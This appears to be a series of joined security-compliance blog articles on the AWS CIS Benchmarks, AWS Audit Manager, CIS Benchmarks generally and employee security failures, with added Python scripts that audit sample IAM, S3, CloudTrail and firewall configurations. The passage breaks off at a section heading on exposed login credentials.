Amazon Web Services (AWS) is the most widely used cloud platform. It offers hundreds of networking, storage, compute, and managed cloud services, each of which helps organizations to build robust and reliable IT infrastructure without the need to manage data centers and physical hardware. 

However, AWS’s richness and complexity make it challenging to configure and administer in a way that maximizes security, privacy, and compliance. This is a particular problem for organizations lacking cloud security expertise: they can deploy cloud infrastructure and services, but struggle to secure them.

AWS CIS Benchmarks provide guidance and recommendations that help organizations to take a systematic, targeted, and effective approach to securing cloud infrastructure. Because CIS Benchmark recommendations map to information security and privacy regulations and standards, they also help organizations to achieve compliance. 

What are AWS CIS Benchmarks?

AWS CIS Benchmarks are platform-specific security recommendations published by the Center for Internet Security and developed by CIS members in a consensus-driven process. CIS membership comprises major cloud providers such as Amazon and Microsoft, as well as corporations, government agencies, and educational institutions. 

AWS CIS Benchmarks provide a secure configuration baseline agreed on by security experts from across the industry. AWS is complex and, as we’ve written before, most cloud security incidents and data leaks result from misconfiguration by the customer rather than from flaws in the platform itself. As the cliché goes, cloud users don’t know what they don’t know; the AWS CIS Benchmarks provide the knowledge organizations need in a comprehensive and actionable format.

The CIS publishes Benchmarks focused on many technologies and platforms, including cloud providers Microsoft Azure and Google Cloud Platform. This article focuses on Benchmarks targeting AWS and its services. We discussed CIS Benchmarks more generally in What Are CIS Benchmarks?

How Are AWS CIS Benchmarks Structured?

AWS Benchmark documents comprise a series of prescriptive configuration recommendations designed to optimize security and defend against common attacks. Each recommendation follows a format that includes:

  • A concise title.
  • An assessment status indicating whether compliance with the recommendation can be checked automatically (Automated) or requires manual review (Manual).
  • A detailed description of the configuration setting and its recommended value.
  • A rationale explaining the reason for the recommendation and its importance.
  • An audit procedure detailing how to determine if a system complies with the recommendation.
  • A remediation procedure to bring the system into compliance.

CIS publishes several Benchmarks relevant to AWS, but organizations typically start with the CIS Amazon Web Services Foundations Benchmark. The Foundations Benchmark is ideal for configuring an AWS environment with a strong security baseline. It provides recommendations for AWS services used by the majority of organizations, including:

  • AWS Identity and Access Management (IAM)
  • AWS Config
  • AWS CloudTrail
  • AWS Simple Notification Service (SNS)
  • AWS Simple Storage Service (S3)
  • Elastic Compute Cloud (EC2)
  • Relational Database Service (RDS)
  • AWS VPC

The Foundations Benchmark provides recommendations that fall into two profiles: Level 1 and Level 2. Level 1 details basic security recommendations that are straightforward to implement with limited impact on the service’s usefulness. Level 2 extends Level 1 with recommendations suited to environments with more stringent security requirements, such as those storing sensitive data. 

In addition to the Foundations Benchmark, CIS publishes Benchmarks that cover other AWS services and use scenarios. These include:

  • CIS AWS End User Compute Services Benchmark: Covers AWS services that include WorkSpaces, WorkDocs, and AppStream, among others.
  • CIS Amazon Web Services Three-tier Web Architecture Benchmark: Extends the Foundations Benchmark with recommendations for web architectures hosted on VPCs.
  • CIS Amazon Linux 2 Benchmark: Provides recommendations for securely configuring the Amazon Linux 2 distribution.
  • CIS Amazon Elastic Kubernetes Service (EKS) Benchmark: Provides recommendations for securing EKS.

8 AWS CIS Standards You Should Know

The CIS Amazon Web Services Foundations Benchmark is a substantial document with dozens of recommendations. To give you some idea of the type of recommendations, we’d like to highlight and briefly explain eight of the most important for organizations working to secure their AWS environment. 

1. Eliminate use of the ‘root’ user for administrative and daily tasks

The root user of an AWS account has unrestricted access to every service and resource in the account, and IAM policies cannot restrict it. It can add and remove users, deploy any infrastructure, and view any data. The root user is needed for a handful of account-level tasks when an account is first set up, but it poses a significant security risk and should not be used for day-to-day management. Create IAM identities for routine work, avoid using the root user wherever possible, and never share its credentials. The Foundations Benchmark adds related recommendations: the root user should have no access keys at all and should be protected with MFA, preferably a hardware device.

2. Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password

With MFA enabled, a leaked, guessed, or shared password is not enough on its own to sign in to the console; the attacker also needs the second factor. AWS supports several MFA methods, including virtual authenticator apps, FIDO security keys, and dedicated hardware TOTP tokens. The recommendation is audited from the IAM credential report, which lists, for every user, whether a console password is enabled and whether MFA is active.
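Recommendations 1 and 2 are both audited from the IAM credential report, so here is an added worked example (not from the benchmark, AWS, or this article’s authors) that applies those checks to a constructed report. The account ID, user names, and dates in the sample are invented; the column names are the ones the real report uses, though a real report has additional columns that this example omits.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed sample in the shape of an IAM credential report, i.e. the CSV
# produced by:
#   aws iam generate-credential-report
#   aws iam get-credential-report --query Content --output text | base64 -d
# Column names are the real ones (a real report has more columns, such as
# access_key_1_last_rotated and cert_1_active); the account ID, users and
# dates are invented for this example.
SAMPLE_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,mfa_active,access_key_1_active,access_key_1_last_used_date,access_key_2_active,access_key_2_last_used_date
<root_account>,arn:aws:iam::111122223333:root,2020-01-10T09:00:00+00:00,not_supported,2024-03-02T14:05:00+00:00,not_supported,false,true,2024-02-28T10:00:00+00:00,false,N/A
alice,arn:aws:iam::111122223333:user/alice,2021-05-01T12:00:00+00:00,true,2024-03-01T08:30:00+00:00,2023-12-01T08:30:00+00:00,true,false,N/A,false,N/A
bob,arn:aws:iam::111122223333:user/bob,2022-02-14T12:00:00+00:00,true,2024-02-20T17:45:00+00:00,2024-01-02T17:45:00+00:00,false,true,2024-03-01T11:00:00+00:00,false,N/A
deploy-bot,arn:aws:iam::111122223333:user/deploy-bot,2022-06-30T12:00:00+00:00,false,N/A,N/A,false,true,2024-03-03T02:00:00+00:00,false,N/A
"""

ROOT = "<root_account>"
NO_VALUE = {"", "N/A", "no_information", "not_supported"}


def _timestamp(value):
    """Parse a report timestamp; the report writes N/A, no_information or
    not_supported where no value exists."""
    if value in NO_VALUE:
        return None
    return datetime.fromisoformat(value)


def parse_report(csv_text):
    return list(csv.DictReader(io.StringIO(csv_text)))


def audit_credential_report(rows, now, root_use_window_days=30):
    """Return (identity, finding) pairs for the two IAM recommendations.

    Root user: flag active access keys, missing MFA, and any password or
    access-key use inside the recent window (the benchmark wants the root
    user left alone; an alarm on every root login belongs to the
    monitoring section).
    IAM users: flag a console password (password_enabled == true) without
    mfa_active == true. Programmatic-only users are out of scope here.
    """
    findings = []
    for row in rows:
        if row["user"] == ROOT:
            if row["access_key_1_active"] == "true" or row["access_key_2_active"] == "true":
                findings.append((ROOT, "root user has an active access key"))
            if row["mfa_active"] != "true":
                findings.append((ROOT, "root user has no MFA"))
            used = (_timestamp(row[c]) for c in
                    ("password_last_used", "access_key_1_last_used_date", "access_key_2_last_used_date"))
            if any(now - t <= timedelta(days=root_use_window_days) for t in used if t):
                findings.append((ROOT, f"root credentials used within the last {root_use_window_days} days"))
            continue
        if row["password_enabled"] == "true" and row["mfa_active"] != "true":
            findings.append((row["user"], "console password enabled without MFA"))
    return findings


def audit_report_text(csv_text, now_iso):
    """Convenience wrapper: CSV text plus an ISO-8601 'now' with a UTC offset,
    e.g. '2024-03-05T00:00:00+00:00' (the report's timestamps carry offsets)."""
    return audit_credential_report(parse_report(csv_text), datetime.fromisoformat(now_iso))


if __name__ == "__main__":
    for identity, finding in audit_report_text(SAMPLE_REPORT, "2024-03-05T00:00:00+00:00"):
        print(f"{identity}: {finding}")
```

Against the sample, the root user produces three findings (an access key, no MFA, and recent use) and bob one; alice has MFA and deploy-bot has no console password, so neither is flagged. Run against a real report, the same function gives you the evidence the benchmark’s audit procedure asks for without clicking through every user in the console.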

3. Ensure all S3 buckets employ encryption-at-rest

Data stored in Amazon S3 should be encrypted at rest so that it is unreadable to anyone who obtains the underlying storage without the key. Server-side encryption is not a substitute for access control, however: a principal with s3:GetObject permission (and, for SSE-KMS, kms:Decrypt) reads objects transparently decrypted, so the control complements bucket policies and Block Public Access rather than replacing them. Note that S3 now applies SSE-S3 encryption to every new object by default; the remaining decision is whether a bucket needs SSE-KMS with a customer managed key, which adds key-usage logging in CloudTrail and lets you revoke access at the key.

The CIS Amazon Web Services Foundations Benchmark also recommends enabling encryption for Elastic Block Store (EBS), Relational Database Service (RDS), and Elastic File System (EFS).

4. Ensure that S3 Buckets are configured with ‘Block public access’

S3 buckets can be configured to allow access to anyone without authentication, through either a public bucket policy or public ACLs. Although this is occasionally useful when serving data to the public, accidentally or negligently making a bucket public is a major cause of data leaks. Block Public Access consists of four settings (BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets) that can be applied per bucket and, more robustly, to the whole account. The benchmark expects all four to be enabled unless you are confident that public access is safe and necessary for a specific bucket.

5. Ensure CloudTrail is enabled in all regions

AWS CloudTrail records the API calls made in your account, whether from the console, the CLI, or an SDK, and delivers the log files to an S3 bucket. Administrators can use the logs to monitor AWS usage for unexpected patterns, identify possible attacks, and build an audit trail for compliance. A single-region trail misses activity in every other region, including regions you never intend to use, which is where attackers like to start resources unnoticed; the benchmark therefore calls for a multi-region trail that is actively logging. Enabling CloudTrail this way is essential to understanding how your AWS environment is used and by whom.

6. Ensure CloudTrail trails are integrated with CloudWatch Logs

CloudWatch Logs is a monitoring service that ingests log data, including CloudTrail events, for analysis and alerting. Sending a trail to a CloudWatch Logs log group lets you define metric filters and alarms for security-relevant events such as root user logins, unauthorized API calls, and changes to IAM policies or security groups. The benchmark’s monitoring section consists of exactly such filter-and-alarm pairs, and every one of them depends on this integration being in place.

7. Ensure no Network ACLs allow ingress from 0.0.0.0/0 to remote server administration ports

Network Access Control Lists are stateless firewalls applied at the subnet level that filter traffic entering and leaving each subnet. Blocking unrestricted access to server administration ports such as SSH (TCP 22) and RDP (TCP 3389) prevents attackers anywhere on the internet from probing and brute-forcing those services. NACL rules are evaluated in rule-number order with the first match winning, so an allow rule for 0.0.0.0/0 that covers these ports is a finding regardless of what higher-numbered rules say.

The AWS Benchmarks include a similar recommendation for security groups, AWS’s stateful instance-level firewall: “Ensure no security groups allow ingress from 0.0.0.0/0 to remote server administration ports.” Later Benchmark versions apply the same check to the IPv6 equivalent, ::/0.

8. Ensure the default security group of every VPC restricts all traffic

When an EC2 instance is launched in a VPC without an explicit security group, it is attached to the VPC’s default security group. As created by AWS, the default group allows all inbound traffic from other resources that also use the default group, and allows all outbound traffic. That makes it easy to end up with instances that can reach each other, and the internet, without anyone having decided they should. The benchmark recommends removing every inbound and outbound rule from the default security group so that it permits no traffic at all, and assigning purpose-built security groups to workloads instead.
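Recommendations 4 through 8 (and the Level 2 log file validation control) are configuration checks that can be run against the JSON the AWS CLI or boto3 returns. The following is an added example, not code from CIS, AWS, or this article’s authors, that applies those checks to constructed sample data shaped like the output of get-public-access-block, describe-trails together with get-trail-status, describe-security-groups, and describe-network-acls. Every bucket name, trail name, ARN, and resource ID in the sample is invented.

```python
# Constructed sample data shaped like the JSON from the AWS CLI / boto3 calls
# named below; every bucket name, trail, ARN and resource ID is invented.
ADMIN_PORTS = {22, 3389}                      # SSH and RDP, the ports the benchmark names
ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")

# s3api get-public-access-block, per bucket. {} stands for the
# NoSuchPublicAccessBlockConfiguration error a bucket with no settings returns.
BUCKET_PUBLIC_ACCESS = {
    "logs-bucket": dict.fromkeys(PAB_KEYS, True),
    "marketing-assets": {"BlockPublicAcls": True, "IgnorePublicAcls": False,
                         "BlockPublicPolicy": False, "RestrictPublicBuckets": False},
    "ancient-bucket": {},
}
# cloudtrail describe-trails, with IsLogging merged in from get-trail-status.
TRAILS = [
    {"Name": "org-trail", "IsMultiRegionTrail": True, "IsLogging": True, "LogFileValidationEnabled": True,
     "CloudWatchLogsLogGroupArn": "arn:aws:logs:us-east-1:111122223333:log-group:cloudtrail:*"},
    {"Name": "legacy-trail", "IsMultiRegionTrail": False, "IsLogging": True, "LogFileValidationEnabled": False},
]
# ec2 describe-security-groups, trimmed to the fields the checks read.
SECURITY_GROUPS = [
    {"GroupId": "sg-0default", "GroupName": "default",
     "IpPermissions": [{"IpProtocol": "-1", "UserIdGroupPairs": [{"GroupId": "sg-0default"}]}],
     "IpPermissionsEgress": [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": ANY_V4}]}]},
    {"GroupId": "sg-0bastion", "GroupName": "bastion", "IpPermissionsEgress": [],
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": ANY_V4}]}]},
    {"GroupId": "sg-0web", "GroupName": "web", "IpPermissionsEgress": [],
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": ANY_V4}]},
                       {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "10.0.0.0/8"}]}]},
]
# ec2 describe-network-acls. Protocol is a number as a string: "6" = TCP, "-1" = all.
NETWORK_ACLS = [
    {"NetworkAclId": "acl-0public", "Entries": [
        {"RuleNumber": 100, "Protocol": "6", "RuleAction": "allow", "Egress": False,
         "CidrBlock": ANY_V4, "PortRange": {"From": 1024, "To": 65535}},   # "ephemeral ports" rule; covers 3389
        {"RuleNumber": 110, "Protocol": "6", "RuleAction": "allow", "Egress": False,
         "CidrBlock": ANY_V4, "PortRange": {"From": 3389, "To": 3389}},    # RDP from the world
        {"RuleNumber": 32767, "Protocol": "-1", "RuleAction": "deny", "Egress": False, "CidrBlock": ANY_V4}]},
    {"NetworkAclId": "acl-0private", "Entries": [
        {"RuleNumber": 100, "Protocol": "-1", "RuleAction": "allow", "Egress": False, "CidrBlock": "10.0.0.0/16"},
        {"RuleNumber": 32767, "Protocol": "-1", "RuleAction": "deny", "Egress": False, "CidrBlock": ANY_V4}]},
]


def covers_admin_port(protocol, from_port=None, to_port=None):
    """True if a rule for this protocol and port range reaches SSH or RDP.
    All protocols (-1), or TCP with no port range, means every port."""
    if protocol == "-1":
        return True
    if protocol not in ("tcp", "6"):
        return False
    if from_port is None or to_port is None:
        return True
    return any(from_port <= port <= to_port for port in ADMIN_PORTS)


def check_public_access_block(buckets):
    """Recommendation 4: every bucket has all four Block Public Access settings on."""
    return [(name, "Block Public Access incomplete, missing " + ", ".join(k for k in PAB_KEYS if not cfg.get(k)))
            for name, cfg in buckets.items() if not all(cfg.get(k) for k in PAB_KEYS)]


def check_cloudtrail(trails):
    """Recommendations 5 and 6, plus the Level 2 log file validation control."""
    findings = []
    if not any(t.get("IsMultiRegionTrail") and t.get("IsLogging") for t in trails):
        findings.append(("account", "no multi-region trail is actively logging"))
    for t in trails:
        if not t.get("LogFileValidationEnabled"):
            findings.append((t["Name"], "log file validation disabled"))
        if not t.get("CloudWatchLogsLogGroupArn"):
            findings.append((t["Name"], "not delivered to CloudWatch Logs"))
    return findings


def check_security_groups(groups):
    """Recommendation 8, and the security-group twin of recommendation 7 (IPv4 and IPv6)."""
    findings = []
    for sg in groups:
        if sg["GroupName"] == "default" and (sg["IpPermissions"] or sg["IpPermissionsEgress"]):
            findings.append((sg["GroupId"], "default security group still permits traffic"))
        for rule in sg["IpPermissions"]:
            cidrs = [r["CidrIp"] for r in rule.get("IpRanges", [])] + [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])]
            if any(c in (ANY_V4, ANY_V6) for c in cidrs) and covers_admin_port(rule["IpProtocol"], rule.get("FromPort"), rule.get("ToPort")):
                findings.append((sg["GroupId"], "ingress from anywhere to a remote administration port"))
    return findings


def check_network_acls(acls):
    """Recommendation 7. Only inbound allow entries from 0.0.0.0/0 or ::/0 count; NACLs are
    evaluated in rule-number order, so such an entry is a finding whatever later rules say."""
    findings = []
    for acl in acls:
        for e in acl["Entries"]:
            world = e.get("CidrBlock") == ANY_V4 or e.get("Ipv6CidrBlock") == ANY_V6
            if e["Egress"] or e["RuleAction"] != "allow" or not world:
                continue
            ports = e.get("PortRange", {})
            if covers_admin_port(e["Protocol"], ports.get("From"), ports.get("To")):
                findings.append((acl["NetworkAclId"], f"rule {e['RuleNumber']} allows ingress from anywhere to a remote administration port"))
    return findings


def run_all():
    return {"s3_block_public_access": check_public_access_block(BUCKET_PUBLIC_ACCESS),
            "cloudtrail": check_cloudtrail(TRAILS),
            "security_groups": check_security_groups(SECURITY_GROUPS),
            "network_acls": check_network_acls(NETWORK_ACLS)}
```

Calling run_all() on the sample flags two buckets, two problems with legacy-trail, the still-populated default security group and the bastion group, and two NACL entries. The second NACL finding is worth noticing: the widely copied “ephemeral ports” rule allowing TCP 1024-65535 inbound from 0.0.0.0/0 also admits RDP on 3389, so the benchmark’s audit procedure flags it even though nobody wrote “3389” anywhere. In practice you would replace the constants with the parsed output of the corresponding CLI or boto3 calls; the check logic stays the same.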

Verify Your AWS Environment Conforms To CIS AWS Benchmarks

KirkpatrickPrice’s cloud security audits will help your organization to understand the security and compliance status of its AWS environment. Our cloud audit framework is based on the CIS Benchmarks, and experienced AWS Certified Cloud Practitioners carry out all audits. Contact a cloud security specialist to learn more.

Audits are essential for businesses that need to demonstrate compliance with regulatory frameworks and standards, but they are often time-consuming and disruptive. Businesses must ensure relevant controls are implemented and gather evidence to demonstrate implementation to auditors. Evidence gathering is among the most time-consuming and error-prone aspects of auditing, but it is, fortunately, an aspect that can be automated to some degree. 

AWS Audit Manager is an evidence-collection automation tool for the Amazon Web Services cloud platform. In this article, we’ll explore how AWS Audit Manager can streamline your audit process. We’ll also consider what it can’t do and why you should consider using a CPA-backed audit management solution like the KirkpatrickPrice Online Audit Manager.

What is an Audit Manager?

Audit management aims to organize, simplify,  and streamline the auditing process. Traditionally, an audit manager was a professional who facilitated audits within a company. Today, the term is increasingly used for software services that perform some of the same roles. 

Audit manager software helps businesses to gather and organize audit evidence. It also tracks the evidence-gathering process so stakeholders can monitor progress and prioritize audit-related work. The software is typically aware of the processes and procedures a business must implement to comply with various regulatory requirements and therefore provides a framework that guides evidence gathering. 

Once the evidence has been gathered, it can then be supplied to the CPA firm carrying out the audit. It is worth noting that CPA-operated audit managers like the KirkpatrickPrice Online Audit Manager allow auditees to communicate directly with their auditor. They can ask the auditor questions and receive advice and guidance, and the auditor can review materials as they are gathered. A platform-specific audit management tool like AWS Audit Manager lacks this facility. However, it can be useful as one platform-specific stage of an end-to-end evidence-gathering process.

How Does AWS Audit Manager Streamline Compliance Audits?

AWS Audit Manager is a cloud service that automates the collection of compliance evidence. The business tells Audit Manager which controls are relevant, where a control is a “rule” from a regulatory framework or standard. Audit Manager then pulls relevant data from other AWS services, including AWS Security Hub, AWS Config, and AWS CloudTrail. That data is used as evidence of the control’s implementation and is converted to an auditor-friendly format.

Continuous Compliance

Continuous compliance is one of the most significant advantages of automated evidence gathering. When evidence gathering is manual, it tends to be carried out periodically. Evidence is gathered for “the big audit,” and because that’s an expensive process, it isn’t repeated until the next audit period rolls around. 

Automated evidence gathering helps businesses to maintain continuous compliance. Evidence gathering becomes a much lower effort, so keeping audit evidence up-to-date makes sense. Because the evidence is always fresh, it’s possible to maintain continuous compliance, and there’s much less evidence gathering overhead when a new audit is required. 

Automatic Evidence Collection

After initial configuration, which we’ll discuss in the next section, AWS Audit Manager is almost entirely automated. It supports several automated data sources with varying data collection frequencies:

  • Amazon CloudTrail is used to track user activity. Data is collected continuously. 
  • AWS Config provides snapshots of resource security. Data is collected when triggered by an AWS Config rule.
  • AWS Security Hub provides snapshots from security checks. Data is collected per Security Hub check schedules. 
  • AWS API calls collect resource configuration data snapshots from AWS resources daily, weekly, or monthly.

Simplified Audit Workflows

Evidence gathering can be complex and challenging to manage. It’s easy to make mistakes that extend the length and increase the cost of audits. Automatic data collection lifts a significant burden from auditees. The software completes most of the evidence gathering without human intervention, which is possible because AWS Audit Manager is deeply integrated into the AWS platform. 

The tradeoff is that it can only gather evidence from AWS, and you must find another solution for on-premise infrastructure or resources hosted on other cloud platforms. That’s where a platform agnostic audit management solution like the KirkpatrickPrice Online Audit Manager shines: it can be used to gather and manage evidence from all of your business’s infrastructure, including the evidence generated by AWS Audit Manager. 

Audit Evidence Access Controls

Audit evidence is confidential, and access must be controlled and managed. As you might expect, AWS Audit Manager works with AWS Identity and Access Management (IAM), a solution businesses with AWS-based infrastructure use already. Audit Manager can segregate individual assessments to ensure they are accessed only by authorized individuals and groups. 

AWS Audit Manager Frameworks Explained

Thus far, we’ve said little about how users select which evidence is to be gathered. That’s the role of Audit Manager frameworks. Frameworks structure and automate assessments, the Audit Manager function that gathers evidence relevant to an audit. 

Each framework provides groups of audit controls and mappings to AWS resources and data. These mappings are particularly useful: without them, it requires considerable expertise to link the controls in regulatory standards to resources and configurations on real-world infrastructure platforms.

AWS provides pre-built frameworks for a range of compliance standards, including:

  • ISO/IEC 27001:2013 Annex A
  • PCI DSS V3.2.1
  • SOC 2
  • CIS Benchmark for CIS Amazon Web Services Foundations Benchmark
  • General Data Protection Regulation (GDPR)
  • FedRAMP Moderate Baseline
  • Health Insurance Portability and Accountability Act (HIPAA)

In addition to pre-built frameworks, users can build custom frameworks. These allow businesses to deploy AWS Audit Manager assessments for which no pre-built option exists. They can also create assessments and gather evidence to meet other business needs, including internal audits. 

The Limitations of Audit Managers and Audit Automation

AWS Audit Manager is a valuable tool for businesses with AWS-hosted infrastructure and services. It performs well within the limited scope of its capabilities. But it is not a complete audit automation solution. Most importantly, no audit automation tool can complete an audit, assess compliance, and deliver a reputable audit report. For many regulatory standards, only a licensed CPA firm with information security expertise can do so. Amazon’s documentation makes this clear: 

“AWS Audit Manager assists in collecting evidence that’s relevant for verifying compliance with specific compliance standards and regulations. However, it doesn’t assess your compliance itself.”

Other limitations include:

  • Evidence-gathering is limited to AWS and the data sources the platform supports.
  • A lack of direct contact with auditors.
  • Limited project management capabilities.

AWS Audit Manager can be used in conjunction with a CPA-supported audit management tool that helps users to overcome these limitations. KirkpatrickPrice’s Online Audit Manager is used to gather evidence and streamline audits for many infrastructure platforms.  In addition to being an evidence-gathering tool, it is also a powerful communication, accountability, and project management platform that provides direct access to your auditor. Contact a senior audit specialist to learn more. 

CIS Benchmarks are collections of recommendations and best practices for securely configuring servers, networks, software, and other IT systems. Developed by the Center for Internet Security, the benchmarks provide guidance businesses can use to implement secure systems, assess their current level of security, and achieve regulatory compliance. 

Given the number and complexity of IT services and systems, it is challenging for businesses to develop policies and implement procedures that maintain adequate security. CIS Benchmarks provide comprehensive best practices for various platforms and technologies, including cloud platforms like AWS and Microsoft Azure.

In this article, we take a closer look at CIS Benchmarks and how businesses can use them to improve cybersecurity and compliance with information security regulations and standards. 

What is the Center for Internet Security?

The Center for Internet Security (CIS) is a non-profit organization that aims to make the internet safe by devising and promoting security best practices. It publishes the CIS Controls and CIS Benchmarks, which are developed in a crowd-sourced consensus-driven process by a membership that includes corporations, government agencies, and other institutions.

What Are CIS Benchmarks?

The CIS Benchmarks are recommendations for securing IT systems. They provide the information businesses need to verify they are following best practices and instructions for best practice implementation.

To look more closely at one of the dozens of CIS Benchmarks, the CIS Amazon Web Services Foundations Benchmark is a 250-page document covering security benchmarks for a wide range of AWS services, including identity and access management, storage, logging, monitoring, and networking. 

Each section provides best practices for commonly used services. For example, the storage section covers S3, EBS volumes attached to EC2 instances, RDS, and EFS. Each recommendation includes a rationale, an audit procedure for verifying that it is implemented, and remediation instructions explaining how to bring the service into compliance.

The benchmarks are a valuable resource for businesses that need to assess and improve their security posture. That’s why we use the CIS Benchmarks for cloud services—including AWS, Azure, and GCP—as the foundation of our cloud security audits.

CIS Controls vs. CIS Benchmarks

As part of its mission to promote internet security, the CIS publishes the CIS Controls, a compendium of 18 critical security best practices that businesses should follow to defend against known cyberattacks. The controls address many areas, including asset inventory and control, data protection, access management, malware defenses, network monitoring, penetration testing, and more. Like the CIS Benchmarks, the CIS Controls are free, and they can be downloaded by any business looking to implement secure systems.

CIS Controls and CIS Benchmarks differ in specificity. Whereas the CIS Controls offer broad, high-level best practices for a wide range of systems, the CIS Benchmarks offer actionable best practices for specific platforms and technologies, including cloud platforms, operating systems, network-connected devices, and applications. Many CIS Benchmarks refer to the relevant CIS Controls so users can track their progress towards compliance. 

Which Information Security Areas Are Covered By CIS Standards?

CIS Benchmarks cover a wide array of services, platforms, and software, including, among others:

  • Desktop operating systems: Microsoft Windows and macOS.
  • Server operating systems: Debian, Ubuntu, CentOS, RHEL.
  • Server software: Microsoft IIS, Microsoft Windows Server, Nginx, Apache.
  • Virtualization and Cloud Software: VMware, Kubernetes, Docker.
  • Cloud platforms: AWS, Microsoft Azure, Google Cloud Platform, Alibaba Cloud.
  • Desktop software: Microsoft Office, Google Chrome, Safari, Zoom.

What Are CIS Benchmark Levels?

CIS associates each benchmark recommendation with a profile level: Level 1, Level 2, or STIG. The profiles indicate the security level achieved by implementing a recommendation. 

Level 1 recommendations are basic security practices essential to creating a secure IT environment. Level 2 recommendations are high-security recommendations for systems hosting sensitive data or other high-security scenarios. Level 2 recommendations may be more difficult to implement, and they may disrupt a business’s operations. 

For example, the CIS Amazon Web Services Foundations Benchmark contains the following two recommendations, applicable to Level 1 and Level 2, respectively. 

  • Level 1: Ensure CloudTrail is enabled in all regions
  • Level 2: Ensure CloudTrail log file validation is enabled

The STIG profile is intended to help businesses to comply with the Security Technical Implementation Guide, a baseline security standard created by the Defense Information Systems Agency (DISA). The STIG profile includes CIS Level 1 and Level 2 recommendations, as well as additional recommendations required for STIG compliance. 

What are CIS Hardened Images?

CIS Hardened Images are virtual machine (VM) images with configurations that conform to the CIS Benchmarks. A VM image is a snapshot of a computer storage device containing the operating system and key library and utility software. They can be run directly by virtualization software and cloud platforms or copied to a physical server. 

CIS Hardened Images enable businesses to deploy servers and other devices with secure configurations out-of-the-box. Installing a secure VM image is a faster and more reliable way to achieve benchmark compliance than installing an operating system and software and then manually configuring it.

CIS publishes hardened images for most major server operating systems, including Microsoft Windows Server, Amazon Linux, Debian, Ubuntu, CentOS, Oracle Linux, and Red Hat Enterprise Linux. It also publishes images for applications such as Nginx and PostgreSQL. 

Major cloud platforms, including AWS, Microsoft Azure, Google Cloud Platform, and Oracle Cloud, offer CIS Hardened Images in their marketplaces, allowing users to deploy the images directly to virtual servers running on the platform. 

CIS Benchmarks and Regulatory Compliance

Regulatory frameworks and standards impose security and privacy obligations on businesses, but they do not provide concrete guidance for achieving compliance. It’s challenging for businesses to bridge the gap between regulations and real-world implementations on particular platforms. 

CIS Benchmarks are designed to align with major information security regulatory frameworks and standards. In CIS’s language, the recommendations “map” to regulations and standards. Implementing CIS benchmark recommendations can therefore help businesses to comply with aspects of standards and frameworks that include:

  • PCI DSS
  • HIPAA
  • NIST
  • FISMA
  • GDPR
  • ISO 27001

One example of how this works is PCI DSS Requirement 2.2 (v3.2.1; Requirement 2.2.1 in v4.0), which requires organizations that process cardholder data to “develop configuration standards for all system components…consistent with industry-accepted hardening standards.” CIS Benchmarks qualify as such a standard. In fact, the v3.2.1 requirement names CIS explicitly as a source of industry-accepted hardening standards, alongside ISO, the SANS Institute, and the National Institute of Standards and Technology (NIST).

Verify Your IT Environment Is Secure and Compliant

CIS Benchmarks make it easier for businesses to secure IT systems and comply with information security standards and regulations. However, compliance should be verified by an independent third party. 

KirkpatrickPrice helps organizations assess, verify, enhance, and demonstrate their security with compliance audits, pen testing, security awareness training, and more. Our comprehensive audit capabilities include:

To learn more, contact a KirkpatrickPrice information security specialist today.

Business managers and IT professionals are inclined to attribute employee-caused security failures to malice, ignorance, or laziness. After all, the business has security policies and procedures. Employees know about them or, at the very least, have signed a declaration affirming they know about them. The IT team has implemented secure systems. 

And yet, employees often circumvent these systems and ignore information security policies, exposing the business to cybersecurity attacks and regulatory risk. Malice and incompetence seem the parsimonious explanation. But the real reasons are more complex.

Why Do Employees Fail to Comply with Security Policies?

A recent study reported in the Harvard Business Review found that few security policy violations stem from conscious malice, even when the violation itself was deliberate. Why Employees Violate Cybersecurity Policies attributes the majority of employee security protocol breaches to four causes:

  • To better accomplish tasks for their job.
  • To access information or functionality they need to do their job.
  • To help other employees to do their work.
  • Because stress drives them to increase productivity at the expense of security.

In short, employees typically fail to comply with security policies for productivity and altruism, not malice or ignorance. That doesn’t make failure to comply any more acceptable or mitigate the regulatory risk, but it may help businesses to build secure and efficient processes. 

The 6 Common Employee Security and Compliance Failures

Understanding why employees fail to comply is helpful, but businesses also need to know how employees typically breach security policies. Let’s explore six of the most common ways employees fail to follow security best practices. 

1. Configuration Errors

Configuration errors expose software and services to increased security risk. For example, it is a configuration error to grant public access to an AWS S3 bucket that stores sensitive information.

The OWASP Top Ten (2021) ranks Security Misconfiguration fifth among web application risks: 90% of the applications in its data set were tested for some form of misconfiguration, with an average incidence rate of about 4.5%. Misconfiguration is also a significant source of cloud security breaches; the National Security Agency (NSA) identifies it as the most prevalent cloud vulnerability.

Other common examples of misconfiguration include:

  • Deploying publicly accessible databases with inadequate authentication
  • Using default usernames and passwords
  • Configuring firewalls with overly permissive rules
  • Failing to limit access to sensitive data and resources

2. Falling for Social Engineering Attacks

Social engineering attacks manipulate employees into acting in ways that are contrary to security policies. Phishing attacks are the most common type. In a phishing attack, the attacker sends an email or instant message containing a malicious link to many different employees. The link might lead to a fake login form or a malware-infected site. 

The attacker wants to harvest login credentials or infect a trusted device. Once they can access one device, they can use it to island hop to others, circumvent security controls, and gather sensitive information.

Every organization is at risk of phishing, but it’s far from the only social engineering attack. Others include:

  • Spear phishing: a refined phishing variant that focuses on specific employees within an organization, using knowledge of the individual to craft a convincing deception. High-level executives and technical employees with wide-ranging access to IT systems are frequent spear phishing targets.
  • Smishing: phishing delivered by SMS, often from spoofed phone numbers, to manipulate employees into following a link or replying with credentials.
  • Executive impersonation attacks: the attacker contacts an employee while pretending to be a high-level executive, often to ask the employee to send money to an account under the attacker’s control. Employees rarely have the confidence to challenge executive requests.

3. Exposing Log-In Credentials

